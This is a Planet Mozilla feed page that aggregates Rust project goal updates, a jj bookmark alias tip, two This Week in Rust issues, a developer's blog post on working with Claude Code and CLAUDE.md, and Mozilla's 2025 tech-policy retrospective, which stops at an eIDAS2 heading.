Comment by @oli-obk posted on 2025-12-15:

Updates

  • https://github.com/rust-lang/rust/pull/148820 adds a way to mark functions and intrinsics as only callable during CTFE
  • https://github.com/rust-lang/rust/pull/144363 has been unblocked and just needs some minor cosmetic work

Blockers

  • https://github.com/rust-lang/rust/pull/146923 (reflection MVP) has not been reviewed yet
Rework Cargo Build Dir Layout (rust-lang/rust-project-goals#401)
Progress
Point of contact

Ross Sullivan

Champions

cargo (Weihang Lo)

Task owners

Ross Sullivan

1 detailed update available.

Comment by @ranger-ross posted on 2025-12-23:

Status update December 23, 2025

The majority of December was spent iterating on https://github.com/rust-lang/cargo/pull/16155. As mentioned in the previous update, the original locking design was not correct and we have been working through other solutions.

As locking is tricky to get right and there are many scenarios Cargo needs to support, we are trying to descope the initial implementation to an MVP, even if that means we lose some of the concurrency. Once we have an MVP on nightly, we can start gathering feedback on the scenarios that need improvement and iterate.

I'm hopeful that we get an unstable -Zfine-grain-locking on nightly in January for folks to try out in their workflows.


Also, we are considering adding an opt-in for the new build-dir layout using an env var (CARGO_BUILD_DIR_LAYOUT_V2=true) to allow tool authors to begin migrating to the new layout. https://github.com/rust-lang/cargo/pull/16336

Before stabilizing this, we are doing a crater run to test the impact of the changes and proactively reaching out to projects to minimize breakage as much as possible. https://github.com/rust-lang/rust/pull/149852

Run more tests for GCC backend in the Rust's CI (rust-lang/rust-project-goals#402)
Progress Completed
Point of contact

Guillaume Gomez

Champions

compiler (Wesley Wiser), infra (Marco Ieni)

Task owners

Guillaume Gomez

No detailed updates available.
Rust Stabilization of MemorySanitizer and ThreadSanitizer Support (rust-lang/rust-project-goals#403)
Progress
Point of contact

Jakob Koschel

Task owners

Bastian Kersting (https://github.com/1c3t3a), Jakob Koschel (https://github.com/jakos-sec)

1 detailed update available.

Comment by @jakos-sec posted on 2025-12-15:

Based on the gathered feedback I opened a new MCP for the proposed new Tier 2 targets with sanitizers enabled. (https://github.com/rust-lang/compiler-team/issues/951)

Rust Vision Document (rust-lang/rust-project-goals#269)
Progress
Point of contact

Niko Matsakis

Task owners

vision team

No detailed updates available.
rustc-perf improvements (rust-lang/rust-project-goals#275)
Progress
Point of contact

James

Champions

compiler (David Wood), infra (Jakub Beránek)

Task owners

James, Jakub Beránek, David Wood

1 detailed update available.

Comment by @Kobzol posted on 2025-12-15:

We have enabled the second x64 machine, so we now have benchmarks running in parallel 🎉 There are some smaller things to improve, but next year we can move on to running benchmarks on Arm collectors.

Stabilize public/private dependencies (rust-lang/rust-project-goals#272)
Progress
Point of contact

Help Wanted

Champions

cargo (Ed Page)

Task owners

Help wanted, Ed Page

No detailed updates available.
Stabilize rustdoc `doc_cfg` feature (rust-lang/rust-project-goals#404)
Progress
Point of contact

Guillaume Gomez

Champions

rustdoc (Guillaume Gomez)

Task owners

Guillaume Gomez

1 detailed update available.

Comment by @GuillaumeGomez posted on 2025-12-17:

Opened the stabilization PR, but there are blockers I hadn't heard of, so stabilization will be postponed until they're resolved.

SVE and SME on AArch64 (rust-lang/rust-project-goals#270)
Progress
Point of contact

David Wood

Champions

compiler (David Wood), lang (Niko Matsakis), libs (Amanieu d'Antras)

Task owners

David Wood

3 detailed updates available.

Comment by @davidtwco posted on 2025-12-15:

I haven't made any progress on Deref::Target yet, but I have been focusing on landing rust-lang/rust#143924, which has gone through two rounds of review and will hopefully be approved soon.

Comment by @nikomatsakis posted on 2025-12-18:

Update: David and I chatted on Zulip. Key points:

David has made "progress on the non-Sized Hierarchy part of the goal, the infrastructure for defining scalable vector types has been merged (with them being Sized in the interim) and that'll make it easier to iterate on those and find issues that need solving".

On the Sized hierarchy part of the goal, no progress. We discussed options for migrating. There seem to be three big options:

(A) The conservative-but-obvious route where T: Deref in the old edition is expanded to T: Deref<Target: SizeOfVal> (but in the new edition it means T: Deref<Target: Pointee>, i.e., no additional bounds). The main downside is that new-edition code using T: Deref can't call old-edition code using T: Deref, as the old-edition code has stronger bounds. Therefore new-edition code must either use stronger bounds than it needs or wait until that old-edition code has been updated.

(B) You do something smart with Edition.Old code where you figure out whether the bound can be loose or strict by bottom-up computation. So T: Deref in the old edition could mean either T: Deref<Target: Pointee> or T: Deref<Target: SizeOfVal>, depending on what the function actually does.

(C) You make Edition.Old code always mean T: Deref<Target: Pointee> and you still allow calls to size_of_val but have them cause post-monomorphization errors if used inappropriately. In Edition.New you use stricter checking.

Options (B) and (C) have the downside that changes to the function body (adding a call to size_of_val, specifically) in the old edition can stop callers from compiling. In the case of Option (B), that breakage is at type-check time, because it can change the where-clauses. In Option (C), the breakage is post-monomorphization.

Option (A) has the disadvantage that it takes longer for the new bounds to roll out.

Given this, (A) seems the preferred path. We discussed options for how to encourage that roll-out, including the idea of a lint that would warn Edition.Old code that its bounds are stronger than needed and suggest rewriting to T: Deref<Target: Pointee> to explicitly disable the stronger Edition.Old default. This lint could be implemented in one of two ways:

  • at type-check time, by tracking what parts of the environment are used by the trait solver. This may be feasible in the new trait solver; someone from @rust-lang/types would have to say.
  • at post-mono time, by tracking which functions actually call size_of_val and propagating that information back to callers. You could then compare against the generic bounds declared on the caller.

The former is more useful (knowing what parts of the environment are necessary could be useful for more things, e.g., better caching); the latter may be easier or more precise.
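
To make option (A)'s suggested rewrite concrete, here is a hypothetical sketch using the trait names from this discussion (SizeOfVal and Pointee are design placeholders, not stable items, so this does not compile today):

use std::ops::Deref;

// Old edition: a bare `T: Deref` would implicitly mean
// `T: Deref<Target: SizeOfVal>`, so the body may call size_of_val.
fn measure<T: Deref>(x: &T) -> usize {
    std::mem::size_of_val(&*x)
}

// Old edition, after applying the lint's suggestion: spelling out the
// weaker bound lets new-edition callers with only
// `T: Deref<Target: Pointee>` call this function too.
fn touch<T: Deref<Target: Pointee>>(x: &T) {
    let _ = &*x; // no size_of_val call, so Pointee suffices
}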

Comment by @nikomatsakis posted on 2025-12-19:

Update to the previous post.

Tyler Mandry pointed me at this thread, where lcnr posted this nice blog post that he wrote detailing more about (C).

Key insights:

  • Because the use of size_of_val would still cause post-mono errors when invoked on types that are not SizeOfVal, you know that adding SizeOfVal into the function's where-clause bounds is not a breaking change, even though adding a where clause is a breaking change more generally.
  • But, to David Wood's point, it does mean that there is a change to Rust's semver rules: adding size_of_val would become a breaking change, where it is not today.

This may well be the best option though, particularly as it allows us to make changes to the defaults across the board. A change to Rust's semver rules is not a breaking change in the usual sense, but it is a notable shift.

Type System Documentation (rust-lang/rust-project-goals#405)
Progress
Point of contact

Boxy

Champions

types (Boxy)

Task owners

Boxy, lcnr

1 detailed update available.

Comment by @BoxyUwU posted on 2025-12-30:

This month I've written some documentation for how const generics are implemented in the compiler. This mostly covers the implementation of the stable functionality, as the unstable features are quite in flux right now. These docs can be found here: https://rustc-dev-guide.rust-lang.org/const-generics.html

Unsafe Fields (rust-lang/rust-project-goals#273)
Progress
Point of contact

Jack Wrenn

Champions

compiler (Jack Wrenn), lang (Scott McMurray)

Task owners

Jacob Pratt, Jack Wrenn, Luca Versari

No detailed updates available.

05 Jan 2026 12:00am GMT

Jonathan Almeida: Update jj bookmarks to the latest revision

Got this one from another colleague as well, but it seems like most folks use some version of this daily, so it might be good to have it built-in.

Before I can jj git push my current bookmark to my remote, I need to move my (tracked) bookmark to the latest change:

@  ptuqwsty git@jonalmeida.com 2026-01-05 16:00:22 451384bf <-- move 'main' here.
  TIL: Update remote bookmark to the latest revision
  xoqwkuvu git@jonalmeida.com 2025-12-30 19:50:51 main git_head() 9ad7ce11
  TIL: Preserve image scale with ImageMagick
~

A quick one-liner jj tug does that for me:

@  ptuqwsty git@jonalmeida.com 2026-01-05 16:03:54 main* 6e7173b4
  TIL: Update remote bookmark to the latest revision
  xoqwkuvu git@jonalmeida.com 2025-12-30 19:50:51 main@origin git_head() 9ad7ce11
  TIL: Preserve image scale with ImageMagick
~

The alias is quite straightforward:

[aliases]
# Update your bookmarks to your latest rev.
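# The revset ::@ & bookmarks() selects the bookmarked ancestors of the
# working copy; heads() keeps only the nearest, so tug moves the
# closest trailing bookmark up to @.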
tug = ["bookmark", "move", "--from", "heads(::@ & bookmarks())", "--to", "@"]

05 Jan 2026 12:00am GMT

31 Dec 2025

feedPlanet Mozilla

This Week In Rust: This Week in Rust 632

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @thisweekinrust.bsky.social on Bluesky or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is wgsl-bindgen, a binding generator for WGSL, the WebGPU shading language, to be used with wgpu.

Thanks to Artem Borisovskiy for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization.

If you are a feature implementer and would like your RFC to appear in this list, add a call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Rustup

Let us know if you would like your feature to be tracked as a part of this list.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on Bluesky or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on Bluesky or Mastodon!

Updates from the Rust Project

297 pull requests were merged in the last week

Compiler
Library
Cargo
Rustdoc
Clippy
Rust-Analyzer
Rust Compiler Performance Triage

Not a lot of changes this week. The overall result is positive, largely thanks to #142881, which makes computing an expensive data structure for the JumpThreading MIR optimization lazy.

Triage done by @panstromek. Revision range: e1212ea7..112a2742

Summary:

(instructions:u)            mean    range            count
Regressions ❌ (primary)     0.5%    [0.1%, 1.7%]     11
Regressions ❌ (secondary)   0.2%    [0.1%, 0.5%]     6
Improvements ✅ (primary)   -0.5%    [-1.3%, -0.1%]   74
Improvements ✅ (secondary) -0.6%    [-1.8%, -0.2%]   71
All ❌✅ (primary)           -0.4%    [-1.3%, 1.7%]    85

2 Regressions, 0 Improvements, 3 Mixed; 1 of them in rollups. 37 artifact comparisons made in total.

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

Tracking Issues & PRs

Compiler Team (MCPs only)

No Items entered Final Comment Period this week for Cargo, Rust, Rust RFCs, Leadership Council, Language Team, Language Reference or Unsafe Code Guidelines.

Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.

New and Updated RFCs
Tracking Issues & PRs
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-12-31 - 2026-01-28 🦀

Virtual
Asia
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

what even is time?!?

- Ralf Jung on his blog

Thanks to llogiq for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by:

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

31 Dec 2025 5:00am GMT

24 Dec 2025

feedPlanet Mozilla

This Week In Rust: This Week in Rust 631

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @thisweekinrust.bsky.social on Bluesky or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is arcshift, an Arc replacement for read-heavy workloads that supports lock-free atomic replacement.

Thanks to rustkins for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization.

If you are a feature implementer and would like your RFC to appear in this list, add a call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Let us know if you would like your feature to be tracked as a part of this list.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

No Calls for participation were submitted this week.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on Bluesky or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on Bluesky or Mastodon!

Updates from the Rust Project

475 pull requests were merged in the last week

Compiler
Library
Rustdoc
Clippy
Rust-Analyzer
Rust Compiler Performance Triage

Very quiet week, with essentially no change in performance.

Triage done by @simulacrum. Revision range: 21ff67df..e1212ea7

1 Regression, 1 Improvement, 3 Mixed; 2 of them in rollups. 36 artifact comparisons made in total.

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

Tracking Issues & PRs

Rust

Cargo

Compiler Team (MCPs only)

Leadership Council

No Items entered Final Comment Period this week for Rust RFCs, Language Team, Language Reference or Unsafe Code Guidelines.

Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.

New and Updated RFCs

Upcoming Events

Rusty Events between 2025-12-24 - 2026-01-21 🦀

Virtual
Asia
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

they should just rename unsafe to C so people can shut up

- /u/thisismyfavoritename on /r/rust

Thanks to Brian Kung for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by:

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

24 Dec 2025 5:00am GMT

20 Dec 2025

feedPlanet Mozilla

Tarek Ziadé: all the code are belong to claude*

I have been writing code for a long time, long enough to be suspicious of tools that claim to fundamentally change how I work. And yet, here we are.

The latest iterations of Claude Code are genuinely impressive. Not in a flashy demo way, but in the quiet, dangerous way where you suddenly realize you have delegated large parts of your thinking to it. This post is about that experience, how Claude helped me build rustnn, what worked remarkably well, and where I had to consciously pull myself back.

Claude as a serious coding partner

For rustnn, I leaned heavily on Claude Code. The quality of the generated Rust was consistently high. Beyond producing correct syntax, it reasoned about what the code was supposed to do. It was context-aware in a way that made iterative design feel natural. I could ask for refactors, architectural changes, or alternative approaches, and get answers that actually respected the existing codebase and long-running tests.

This mirrors what many developers have been reporting toward the end of 2025. Claude Code's agent-oriented design and large-context reasoning make it particularly strong for repository-wide work: multi-file refactors, non-trivial debugging sessions, and architectural changes that need to fit an existing mental model. Compared to Codex-style systems, which still shine for fast edits and local completions, Claude tends to perform better when the task requires sustained reasoning and understanding of project-wide constraints.

Anthropic's recent Claude releases have reinforced that positioning. Improvements in long-context handling, reasoning depth, and agentic workflows make it easier to treat Claude as something closer to a collaborator than an autocomplete engine.

The turning point for me was when I stopped treating Claude like a chatbot and started treating it like a constrained agent.

That is where CLAUDE.md comes in.

Tuning CLAUDE.md

I stumbled upon an excellent LangChain article on how to turn Claude Code into a domain-specific coding agent.

It clicked immediately. Instead of repeatedly explaining the same constraints, goals, and conventions, I encoded them once. Rust style rules. Project intent. Explicit boundaries. How to react to test failures.

The effect was immediate. Output quality improved, and the amount of back-and-forth dropped significantly. Claude stopped proposing things that were clearly out of scope and started behaving like someone who had actually read and understood the project.

For rustnn, I went one step further and anchored development around WPT conformance tests. That gave both Claude and me a shared, objective target. Tests either pass or they do not. No bikeshedding.
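
To give a flavor of what such a file can contain, here is an invented excerpt (not Tarek's actual rustnn file; every detail below is illustrative):

# CLAUDE.md (illustrative excerpt)

## Project intent
rustnn implements WebNN in Rust. WPT conformance tests are the target;
a change is done when the relevant tests pass.

## Rust style
- No unwrap() or expect() outside tests.
- Run cargo fmt and cargo clippy before proposing a diff.

## On test failures
- Re-run only the failing test first; never refactor unrelated code to
  "fix" a failure.

## Boundaries
- Never edit vendored WPT tests or generated bindings.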

Tweaking CLAUDE.md quickly revealed itself as a never-ending process. There are plenty of articles describing different approaches, and none of them are definitive. The current direction seems to be layering information across multiple files, structuring project documentation so it is optimized for agent consumption while remaining readable for humans, and doing so without duplicating the same knowledge in multiple places.

That balance turns out to be just as important as the model itself.

The slippery slope

There is a trap though, and it is a subtle one.

Once Claude is good enough, you start routing everything through it.

It feels efficient, but it is not free. Each interaction has a cost, and when you are in a tight edit-build-test loop, those costs add up fast. Worse, you start outsourcing mechanical thinking that you should probably still be doing yourself.

I definitely fell into that trap.

Reducing costs

The solution, for me, was to drastically reduce how much I talk to Claude, and to stop using its prompt environment as a catch-all interface to the project.

Claude became an extra terminal. One I open for very specific tasks, then close. It is not a substitute for my own brain, nor for the normal edit-build-test loop.

Reducing the context window is also critical. A concrete example is Python tracebacks. They are verbose, repetitive, and largely machine-generated noise. Sending full tracebacks back to the model is almost always wasteful.

That is why I added a hook to rewrite them on the fly into a compact form.

The idea is simple: keep the signal, drop the boilerplate. Same information, far fewer tokens. In practice, this not only lowers costs, it often produces better answers because the model is no longer drowning in irrelevant frames and runtime noise. On Python-heavy codebases, this change alone reduced my usage costs by roughly 20%.
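
A minimal sketch of such a filter, written here as a standalone hook binary in Rust (the real hook and its heuristics are Tarek's own; the filtering rules below are assumptions):

use std::io::{self, Read};

// Reads a Python traceback on stdin and prints a compact version:
// the banner and the final exception line are kept, while frames from
// dependencies and the runtime are dropped.
fn main() -> io::Result<()> {
    let mut input = String::new();
    io::stdin().read_to_string(&mut input)?;
    let lines: Vec<&str> = input.lines().collect();
    let mut kept: Vec<&str> = Vec::new();
    let mut i = 0;
    while i < lines.len() {
        let line = lines[i];
        if line.trim_start().starts_with("File \"") {
            // A frame header; its source line (indented further) may follow.
            let noise = line.contains("site-packages") || line.contains("lib/python");
            let has_src = i + 1 < lines.len() && lines[i + 1].starts_with("    ");
            if !noise {
                kept.push(line);
                if has_src {
                    kept.push(lines[i + 1]);
                }
            }
            i += if has_src { 2 } else { 1 };
        } else {
            // The banner, chained-exception notes, and the final
            // "SomeError: message" line pass through unchanged.
            kept.push(line);
            i += 1;
        }
    }
    println!("{}", kept.join("\n"));
    Ok(())
}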

Pre-compacting inputs turned out to be one of the most effective cost-control strategies I have found so far, especially when combined with a more deliberate, intentional way of interacting with the model.

Memory across sessions actually matters

Another pain point is session amnesia. You carefully explain design decisions, trade-offs, and long-term goals, only to repeat them again tomorrow.

A well-crafted CLAUDE.md mitigates part of this problem. It works well for static knowledge: coding style, project constraints, architectural boundaries, and things that rarely change. It gives Claude a stable baseline and avoids a lot of repetitive explanations.

But it does not capture evolving context.

It does not remember why a specific workaround exists, which approach you rejected last week, or what subtle behavior a particular test exposed yesterday. As soon as the session ends, that knowledge is gone, and you are back to re-teaching the same mental model.

This is where cross-session, cross-project memory becomes interesting.

I am currently experimenting with claude-mem.

The idea is simple but powerful: maintain a centralized, persistent memory that is automatically updated based on interactions. Instead of manually curating context, relevant facts, decisions, and preferences are summarized and carried forward. Over time, this builds a lightweight but durable understanding of how you work and how your projects evolve.

Compared to CLAUDE.md, this kind of memory is dynamic rather than declarative. It captures intent, not just rules. It also scales across projects, which matters when you jump between repositories that share design philosophy, tooling, or constraints.

It is still early, and it is not magic. You need to be careful about what gets remembered and how summaries are formed. But the direction feels right. Persistent memory reduces cognitive reset costs, shortens warm-up time, and makes the interaction feel less like starting over and more like continuing a conversation you paused yesterday.

That difference adds up.

Final thoughts

Claude Code is good. Very good. Good enough that you need discipline to use it well.

With a tuned CLAUDE.md, clear test-driven goals like WPT conformance, and some tooling to reduce noise and cost, it becomes a powerful accelerator. Without that discipline, it is easy to overuse it and slowly burn budget on things you already know how to do.

I do not think this replaces engineering skill. If anything, it amplifies both good and bad habits. The trick is to make sure it is amplifying the right ones.

References

*The title is a deliberate reference to "All your base are belong to us." The grammar is broken on purpose. It is a joke, but also a reminder that when tools like Claude get this good, it is easy to give them more control than you intended.

20 Dec 2025 12:00am GMT

19 Dec 2025

feedPlanet Mozilla

Mozilla Privacy Blog: Behind the Manifesto: Moments that Mattered in our Fight for the Open Web (2025)

Welcome to the blog series "Behind the Manifesto," where we unpack core issues that are critical to Mozilla's mission. The Mozilla Manifesto represents our commitment to advancing an open, global internet that gives people meaningful choice in their online experiences, promotes transparency and innovation and protects the public interest over private walled gardens. This blog series digs deeper on our vision for the web and the people who use it and how these goals are advanced in policymaking and technology.

In 2025, global tech policy raced to keep up with technological change and opportunity. In the midst of this evolution, Mozilla sought to ensure that solutions remained centered on openness, competition and user agency.

From AI Agents and the future of the open web to watershed antitrust cases, competition debates surged. Efforts to drive leadership and innovation in AI led governments across the globe to evaluate priorities. Perennial privacy and security questions remained on the radar, with US states intensifying efforts to pass laws and the EU working to streamline rules on AI, cybersecurity and data. Debates amongst industry, civil society and policymakers reflected the intensity of these moments.

Just as we have for over 20 years, Mozilla showed up to build, convene, debate and advocate. It's clear that more than ever, there must be urgency to truly put people first. Below is a selection of some key moments we're reflecting on as we head into 2026.

FEBRUARY 2025

Mozilla Participates in Paris AI Action Summit as Part of the Steering Committee

Mozilla participated in the Paris AI Action Summit as part of the Steering Committee, with an 'action-packed' schedule that included appearances on panels, a live recording of the podcast "Computer Says Maybe" and a reception to reflect on discussions and thank all the officials and researchers who had worked so hard to make the Summit a success.

Additionally, Mozilla and other partners, including Hugging Face, Microsoft and OpenAI, launched Robust Open Online Safety Tools (ROOST) at the Paris AI Action Summit. The entity is designed to create open source foundations for safer and more responsible AI development, ensuring that safety and transparency remain central to innovation.

The launch of ROOST happened at exactly the right time and in the right place. The Paris AI Action Summit provided a global backdrop for launching work that will ultimately help make AI safety a field that everyone can shape and improve.

Mozilla Event: AI & Competition featuring the President of the German Competition Authority

On February 12, we hosted a public event in Berlin on AI & competition, in partnership with the German daily newspaper Tagesspiegel. Addressing the real risk of market concentration at various levels of the AI stack, the President of the German competition authority (Bundeskartellamt), Andreas Mundt, delivered a keynote address setting out his analysis of competition in AI and the role of his authority in ensuring contestable markets as technology rapidly evolves.

MARCH 2025

America's AI Action Plan

In March, Mozilla responded to the White House's request for information on AI policy, urging policymakers to ensure that AI remained open, competitive and accountable. The comments also warned that concentrated control by a few tech giants threatened innovation and public trust, and called for stronger support of open source AI, public AI infrastructure, transparent energy use and workforce development. Mozilla underscored these frameworks are essential to building an AI ecosystem that serves the public interest rather than purely corporate bottom lines.

Mozilla Mornings: Promoting a privacy-preserving online ads ecosystem

The same month, we also hosted a special edition of Mozilla Mornings focused on the future of online advertising and the role Privacy-Enhancing Technologies (PETs) can play in reshaping it. The conversation came at a critical moment in Europe, amidst discussions on updating privacy legislation while enforcing existing rules.

The session brought together policymakers, technologists, and civil-society experts to examine how Europe can move toward a fairer and more privacy-respecting advertising ecosystem. Speakers explored the limitations of today's surveillance-driven model and outlined how PETs and Privacy-Preserving Technologies (PPTs) could offer a viable alternative that protects users while sustaining the economic foundations of the open web. The event underscored Mozilla's commitment to advancing privacy-respecting technologies and ensuring that both policy and technical design converge toward a healthier online advertising ecosystem.

MAY 2025

CPDP: The Evolution of PETs in Digital Ads

At the Brussels 2025 International CPDP Conference, Mozilla organized and participated in a panel titled "The Evolution of PETs in Digital Ads: Genuine Privacy Innovation or Market Power Play?" The discussion explored how Privacy-Enhancing Technologies (PETs) - tools designed to minimize data collection and protect user privacy - are reshaping the digital advertising landscape. Panelists debated how to encourage genuine privacy innovation without reinforcing existing power structures, and how regulations like the GDPR and the Digital Markets Act (DMA) can help ensure PETs foster transparency and competition.

Competition in Focus: U.S. vs Google

The U.S. v. Google remedies trial was a defining moment - not just for 2025, but for the future of browser and search competition. While the remedies phase was about creating competition in the search market, some of the proposed remedies risked weakening independent browsers like Firefox, the very players that make real choice possible.

In early May, Mozilla's CFO, Eric Muhlheim, testified to this very point. Muhlheim's testimony, and Mozilla's amicus brief in the case, spoke to the vital role of small, independent browsers in driving competition and innovation across the web and warned about the risks of harming their ability to select the search default that best serves their users. Ensuring a competitive search ecosystem while avoiding harm to browser competition remains an important issue in 2026.

JUNE 2025

Open by Design: How Nations Can Compete in the Age of AI

The choices governments make today, about who gets to build, access and benefit from AI, will shape economic competitiveness, national security and digital rights for decades. In June, Mozilla supported a new report by the UK think tank Demos, exploring how and why embracing openness in key AI resources can spur innovation and adoption. Enabling safer, more transparent development and boosting digital sovereignty is a recipe, if there ever was one, for 'winning' at AI.

EU Digital Summit: Advocating for Open and Secure Digital Ecosystems

Digital competitiveness depends on open, secure, and interoperable ecosystems that foster innovation while respecting users' rights. We spoke at the 2025 European Digital Summit - a flagship forum bringing together policymakers, regulators, industry leaders, and civil society - and argued that openness and security reinforce each other, that smart regulation has the potential to lower entry barriers and curb gatekeeping power, and that innovation does not require sacrificing privacy when incentives are aligned toward rights-respecting designs. The takeaway was clear: enforcing interoperability, safeguarding pro-competition rules, and embedding privacy-by-design incentives are essential to a resilient, innovative, and trustworthy open web.

JULY 2025

Joint Letter to the UK Secretary of State on DMCCA

When choice disappears, innovation stalls. In July, Mozilla sent an open letter to UK Ministers and the Competition & Markets Authority to urge faster implementation of the UK Digital Markets, Competition & Consumers Act (DMCCA). As an organisation that exists to create an internet that is open and accessible to all, Mozilla has long supported competitive digital markets. Since the EU Digital Markets Act took effect in 2024, users have begun to benefit from genuine choice for the first time, with interventions like browser choice screens giving people a real choice of browser. The result? People are choosing independent alternatives to gatekeepers' defaults: Firefox daily active users on iOS rose by 150% across the EU. The UK's DMCCA could be similarly revolutionary for UK consumers and the many challenger businesses taking on market dominance.

SEPTEMBER 2025

Digital Bootcamp: Bringing Internet Architecture to the Heart of EU Policymaking

In September, Mozilla officially launched its Digital Bootcamp initiative, developed in partnership with Cloudflare, Proton and CENTR, to strengthen policymakers' understanding of how the internet actually works and why this technical foundation is essential for effective regulation. We delivered interactive sessions across EU institutions, including a workshop for Members of the European Parliament, the European Commission, and representatives of the EU member states.

Across these workshops, we demystified the layered architecture of the internet, explained how a single website request moves through the stack, and clarified which regulatory obligations apply at each layer. By bridging the gap between engineering and policymaking, Digital Bootcamp is helping ensure EU digital laws remain grounded in technical reality, supporting evidence-based decisions that protect innovation, security and the long-term health of the open web.

OCTOBER 2025

Mozilla Meetup: The Future of Competition

On October 8, Mozilla hosted a Meetup on Competition in Washington, D.C., bringing together leading voices in tech policy - including Alissa Cooper (Knight-Georgetown Institute), Amba Kak (AI Now Institute), Luke Hogg (Foundation for American Innovation) and Kush Amlani (Mozilla) - to discuss the future of browser competition, antitrust enforcement and AI's growing influence on the digital landscape. Moderated by Bloomberg's Leah Nylen, the event reinforced our ongoing efforts to establish a more open and competitive internet, highlighting how policy decisions in these areas directly shape user choice, innovation, and the long-term health of the open web.

Global Encryption Day

On October 21, Mozilla marked Global Encryption Day by reaffirming our commitment to strong encryption as a cornerstone of online privacy, security, and trust. For years, Mozilla has played an active role in shaping the broader policy debate on encryption by consistently pushing back against efforts to weaken it and working with partners around the world to safeguard the technology that helps to keep people secure online - from joining the Global Encryption Coalition Steering Committee, to challenging U.S. legislation like the EARN IT Act and leading multi-year efforts in the EU to address encryption risks in the eIDAS Regulation.

California's Opt Me Out Act: A Continuation of the Fight For Privacy

The passage of California's Opt Me Out Act (AB 566) marked a major step forward in Mozilla's ongoing effort to strengthen digital privacy and give users control of their personal data. For years, Mozilla has spoken in support of Global Privacy Control (GPC) - a tool already integrated into Firefox - as a model for privacy-by-design solutions that can be both effective and user-friendly.

NOVEMBER 2025

Mozilla Submits Recommendations on the Digital Fairness Act

In November, Mozilla submitted its response to the European Commission's consultation on the Digital Fairness Act (DFA), framing it as a key opportunity to modernise consumer protection for AI-driven and highly personalised digital services. Mozilla argued that effective safeguards must tackle both interface design and underlying system choices, prohibit harmful design practices, and set clear fairness standards for personalization and advertising. A well-designed DFA can complement existing EU laws, strengthen user autonomy, provide legal certainty for innovators, and support a more competitive digital ecosystem built on genuine user choice.

Mozilla hosts AI breakfast in UK Parliament

Mozilla President, Mark Surman, hosted MPs and Peers for a breakfast in Parliament to discuss how policymakers can nurture AI that supports public good. As AI policy moves from principle to implementation, the breakfast offered insight into the models, trade-offs and opportunities that will define the next phase of the UK's AI strategy.

DECEMBER 2025

Mozilla Joins Tech Leaders at US House AI Caucus Briefing

Internet Works, an association of "Middle Tech" companies, organized a briefing with the Congressional AI Caucus. The goal was to provide members of congress and their staff a better understanding of the Middle Tech ecosystem and how smaller companies are adopting and scaling AI technologies. Mozilla spoke on the panel, lending valued technical expertise and setting out how we're thinking about keeping the web open for innovation, competition and user choice with this new technology stack.

eIDAS2 Regulation: Defending Web Security and Trust

